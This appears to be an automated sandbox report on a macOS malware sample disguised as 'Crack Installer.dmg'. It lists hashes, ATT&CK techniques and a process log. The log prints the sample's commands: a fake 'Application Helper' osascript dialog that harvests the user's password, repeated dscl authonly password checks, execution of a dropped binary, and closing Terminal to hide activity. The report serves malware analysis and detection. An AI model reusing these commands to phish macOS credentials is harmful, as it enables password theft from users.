8d324307b08af033fb998587ab5dfeb292c9859022a8c228ad01e79116091338

General

Target

Crack Installer.dmg
Size

1.7MB
MD5

19dae69fbd8061a574b1da0141bd7fa8
SHA1

123f4d0555604b937c5bbdc2ba61ee4befafc793
SHA256

28e4127655a68b296ae50cf4e1e6ebc9c4270a659d8b09d51390ae4f431985b3
SHA512

decf23bc3cb433ef14b3dc7d15a3ddee2729533d7e9a82f4cbee88a010e50a057713d03a36a659dc399a64941f35c3f3a804784477a274dd277fea3474dae13f
SSDEEP

49152:6J9/P09GCwvCUc2j8oi2lXekk20nWX7gvkAarN9bi7qDb+c:6//P09twKf31tH8XU8LrN9i+P+c

Score

7^/10

evasion execution

Malware Config

Signatures

File Permission 1 TTPs
evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

AppleScript 1 TTPs 10 IoCs

execution

AppleScript

T1059.002

Processes:

ioc	process
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
osascript -e "tell application \"Terminal\" to close first window"
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
sh -c "osascript -e 'tell application \"Terminal\" to close first window'& exit"

Resource Forking 1 TTPs 1 IoCs

evasion

Resource Forking

T1564.009

Processes:

ioc	process
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper

Command and Scripting Interpreter 1 TTPs
execution

Unix Shell
T1059.004

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/Crack\\ Installer\""
1⤵
PID:561

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/Crack\\ Installer\""
1⤵
PID:561

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/Crack\\ Installer"
1⤵
PID:561

/bin/zsh
/bin/zsh -c "open /Volumes/Crack\\ Installer"
2⤵
PID:565

/usr/bin/open
open "/Volumes/Crack Installer"
2⤵
PID:565

/usr/bin/pluginkit
/usr/bin/pluginkit -e ignore -i com.microsoft.OneDrive.FinderSync
1⤵
PID:585

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:586

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:586

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:587

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:588

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:587

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:588

/usr/sbin/spctl
/usr/sbin/spctl --assess --type execute /var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/T/OneDriveUpdater6BDB2703/OneDrive.app
1⤵
PID:589

/usr/libexec/xpcproxy
xpcproxy com.apple.pbs
1⤵
PID:595

/System/Library/CoreServices/pbs
/System/Library/CoreServices/pbs
1⤵
PID:595

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
1⤵
PID:596

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
1⤵
PID:596

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputMenuAgent
1⤵
PID:597

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:598

/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
1⤵
PID:597

/usr/bin/login
login -pf run
1⤵
PID:599

/bin/zsh
-zsh
2⤵
PID:603

/usr/libexec/path_helper
/usr/libexec/path_helper -s
3⤵
PID:604

/usr/bin/locale
locale LC_CTYPE
3⤵
PID:605

/Volumes/Crack Installer/Crack Installer
"/Volumes/Crack Installer/Crack Installer"
3⤵
PID:607

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.systemsoundserverd
1⤵
PID:600

/usr/sbin/systemsoundserverd
/usr/sbin/systemsoundserverd
1⤵
PID:600

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:601

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:602

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputSwitcher
1⤵
PID:606

/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
1⤵
PID:606

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to close first window'& exit"
1⤵
PID:610

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to close first window'& exit"
1⤵
PID:610

/usr/bin/osascript
osascript -e "tell application \"Terminal\" to close first window"
2⤵
PID:611

/bin/sh
sh -c "chmod +x /Users/run/exe"
1⤵
PID:612

/bin/bash
sh -c "chmod +x /Users/run/exe"
1⤵
PID:612

/bin/chmod
chmod +x /Users/run/exe
1⤵
PID:612

/bin/sh
sh -c /Users/run/exe
1⤵
PID:613

/bin/bash
sh -c /Users/run/exe
1⤵
PID:613

/Users/run/exe
/Users/run/exe
1⤵
PID:613

/bin/sh
sh -c "dscl . authonly \"run\" \"\""
1⤵
PID:614

/bin/bash
sh -c "dscl . authonly \"run\" \"\""
1⤵
PID:614

/usr/bin/dscl
dscl . authonly run
1⤵
PID:614

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:615

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:615

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:615

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:616

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:616

/bin/sh
sh -c "dscl . authonly \"run\" \" gave up:false \""
1⤵
PID:620

/bin/bash
sh -c "dscl . authonly \"run\" \" gave up:false \""
1⤵
PID:620

/usr/bin/dscl
dscl . authonly run " gave up:false "
1⤵
PID:620

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:622

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:622

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:622

/usr/libexec/xpcproxy
xpcproxy com.apple.icloud.findmydeviced
1⤵
PID:626

/usr/libexec/findmydeviced
/usr/libexec/findmydeviced
1⤵
PID:626

/bin/sh
sh -c "dscl . authonly \"run\" \"admin\""
1⤵
PID:627

/bin/bash
sh -c "dscl . authonly \"run\" \"admin\""
1⤵
PID:627

/usr/bin/dscl
dscl . authonly run admin
1⤵
PID:627

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:629

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:629

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:629

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:648

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:648

/bin/sh
sh -c "dscl . authonly \"run\" \"123456\""
1⤵
PID:649

/bin/bash
sh -c "dscl . authonly \"run\" \"123456\""
1⤵
PID:649

/usr/bin/dscl
dscl . authonly run 123456
1⤵
PID:649

/bin/sh
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:650

/bin/bash
sh -c "osascript -e 'display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer'"
1⤵
PID:650

/usr/bin/osascript
osascript -e "display dialog \"Required Application Helper. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\" with hidden answer"
1⤵
PID:650

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

AppleScript

1

T1059.002

Unix Shell

1

T1059.004

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Hide Artifacts

1

T1564

Resource Forking

1

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
1KB

MD5
fa4fbae260d5b2dc5a1d820ca56f21f8

SHA1
a35c2b369acc1f3e56d7c8fe45096dd63d837f1f

SHA256
8b4bd3f1e5e23a0bbdf85e5866945eee44e4a7ef998887239a76915689e525ef

SHA512
ee7d8b6b30f55d884f3bb3734697f007b12120394a9df12d1ef3af4ac6f991b8cb1737579d84ee77381a76de8c4327ed2fd1de749d36d65902523112347eed20

Download Submit
/dev/ttys001
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit

Resubmissions

Analysis

Sharing